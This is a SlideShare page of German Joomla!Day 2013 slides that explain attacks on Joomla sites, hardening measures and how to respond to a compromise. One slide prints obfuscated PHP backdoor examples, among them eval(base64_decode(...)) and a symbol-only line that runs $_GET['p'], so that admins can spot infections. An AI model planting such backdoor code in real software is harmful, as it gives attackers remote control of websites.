Angriffe auf Joomla
verstehen und verhindern.
Simon Samtleben
Joomla!Day Deutschland 2013
www.yagendoo.com
Simon Samtleben
@lemmingzshadow
Webentwickler @ yagendoo Media GmbH in Köln
www.yagendoo.com | lemmingzshadow.net
● PHP En...
Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla)...
Schwachstellen finden
● Bruteforceing
– Joomla
– SSH/(S)FTP
● Google Dorks
● Sicherheitslücken
– SQL Injection
– RFC, LFC
Bild: webroot.com
Schwachstellen finden
● Bruteforceing
– Joomla
– SSH/(S)FTP
● Google Dorks
● Sicherheitslücken
– SQL Injection
– RFC, LFC
Bild: webroot.com
Schwachstellen finden
● Bruteforceing
– Joomla
– SSH/(S)FTP
● Google Dorks
● Sicherheitslücken
– SQL Injection
– RFC, LFC
System infizieren
● Vollständig automatisiert
● Typische „Injections“
– Webshells
– Iframes
– Javascripts (Cookie Bombs, ....
Bild: webroot.com
Bild: webroot.com
Warum werden (Joomla)
Webseiten angegriffen?
● Verbreitung von Malware
● Aufbau von Botnets
● E-Mail Spam
● Backlinks / SE...
Die Masse macht's
Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla)...
Serverseitige Schutzmaßnahmen
● Auto IP-Blacklisting
● SSH Login nur über Keys
● Chroot für Projekte
● SFTP statt FTP
● Ei...
Joomlaseitige Schutzmaßnahmen
● Nicht benötigte Erweiterungen löschen
– Auch bei „Schutzsoftware“ vorsichtig sein
– Vorsic...
Joomlaseitige Schutzmaßnahmen
● Regelmäßige Backup
– Akeeba Backup
– Duply, Rsync, Snapshots, …
– Auch alte Backups vorhal...
Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla)...
Was tun wenn mein System
kompromittiert wurde?
● Don't Panic
– Keine wichtige Spuren löschen.
– Backup anlegen.
● Wenn mög...
Was tun wenn mein System
kompromittiert wurde?
● Infektionen sind schwer zu finden
– Einfach
● eval(base64_decode('...'));...
Fragen?
www.yagendoo.com
lemmingzshadow.net
Vielen Dank für's Zuhören!
Angriffe auf Joomla verstehen und verhindern - Joomladay Deutschland 2013
Angriffe auf Joomla verstehen und verhindern - Joomladay Deutschland 2013
Nächste SlideShare
Wird geladen in …5
×

Angriffe auf Joomla verstehen und verhindern - Joomladay Deutschland 2013

432 Aufrufe

Veröffentlicht am

Slides zum Joomladay Vortrag "Angriffe auf Joomla verstehen und verhindern".

Veröffentlicht in: Technologie
0 Kommentare
0 Gefällt mir
Statistik
Notizen
  • Als Erste(r) kommentieren

  • Gehören Sie zu den Ersten, denen das gefällt!

Keine Downloads
Aufrufe
Aufrufe insgesamt
432
Auf SlideShare
0
Aus Einbettungen
0
Anzahl an Einbettungen
2
Aktionen
Geteilt
0
Downloads
4
Kommentare
0
Gefällt mir
0
Einbettungen 0
Keine Einbettungen

Keine Notizen für die Folie

Angriffe auf Joomla verstehen und verhindern - Joomladay Deutschland 2013

  1. 1. Angriffe auf Joomla verstehen und verhindern. Simon Samtleben Joomla!Day Deutschland 2013 www.yagendoo.com
  2. 2. Simon Samtleben @lemmingzshadow Webentwickler @ yagendoo Media GmbH in Köln www.yagendoo.com | lemmingzshadow.net ● PHP Entwicklung ● Joomla ● Websockets ● Serveradministration ● Debian ● Nginx ● Security ● yagendoo.com ● gulli.com ● anonym.to ● 3gstore.de ● iphoneohnevertrag.de
  3. 3. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System „infizieren“. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schützen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde?
  4. 4. Schwachstellen finden ● Bruteforceing – Joomla – SSH/(S)FTP ● Google Dorks ● Sicherheitslücken – SQL Injection – RFC, LFC
  5. 5. Bild: webroot.com
  6. 6. Schwachstellen finden ● Bruteforceing – Joomla – SSH/(S)FTP ● Google Dorks ● Sicherheitslücken – SQL Injection – RFC, LFC
  7. 7. Bild: webroot.com
  8. 8. Schwachstellen finden ● Bruteforceing – Joomla – SSH/(S)FTP ● Google Dorks ● Sicherheitslücken – SQL Injection – RFC, LFC
  9. 9. System infizieren ● Vollständig automatisiert ● Typische „Injections“ – Webshells – Iframes – Javascripts (Cookie Bombs, ...) – Cloaking/Redirects – Sonstiges (IRC Bots, ...)
  10. 10. Bild: webroot.com
  11. 11. Bild: webroot.com
  12. 12. Warum werden (Joomla) Webseiten angegriffen? ● Verbreitung von Malware ● Aufbau von Botnets ● E-Mail Spam ● Backlinks / SEO ● Gezielte Angriffe – Stehlen von Daten
  13. 13. Die Masse macht's
  14. 14. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System „infizieren“. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schützen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde?
  15. 15. Serverseitige Schutzmaßnahmen ● Auto IP-Blacklisting ● SSH Login nur über Keys ● Chroot für Projekte ● SFTP statt FTP ● Eigene SQL Benutzer pro Projekt ● Monitoring (Last, Prozesse, Netzwerk, …) ● Updates, Updates, Updates
  16. 16. Joomlaseitige Schutzmaßnahmen ● Nicht benötigte Erweiterungen löschen – Auch bei „Schutzsoftware“ vorsichtig sein – Vorsicht bei lange nicht aktualisierten Erweiterungen ● Regelmäßig auf Infektionen prüfen – urlquery.net – virustotal.com – myjoomla.com – Extensions
  17. 17. Joomlaseitige Schutzmaßnahmen ● Regelmäßige Backup – Akeeba Backup – Duply, Rsync, Snapshots, … – Auch alte Backups vorhalten! ● Updates, Updates, UPDATES! – Joomla & Extensions – Newsletter, Blogs, Auto-Update, ...
  18. 18. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System „infizieren“. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schützen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde?
  19. 19. Was tun wenn mein System kompromittiert wurde? ● Don't Panic – Keine wichtige Spuren löschen. – Backup anlegen. ● Wenn möglich: Neu aufsetzen. ● Wenn nicht: Backup einspielen. ● Sonst: „Infektionen“ beseitigen.
  20. 20. Was tun wenn mein System kompromittiert wurde? ● Infektionen sind schwer zu finden – Einfach ● eval(base64_decode('...')); – Schwieriger ● $eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir); – Hacker :) ● $_[]++;$_[]=$_._;$_=$_[$_[+_]];$___=$__=$_[++ $__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++ $___.$___.++$_.$__.++$___; $_($_GET['p']);
  21. 21. Fragen? www.yagendoo.com lemmingzshadow.net
  22. 22. Vielen Dank für's Zuhören!

×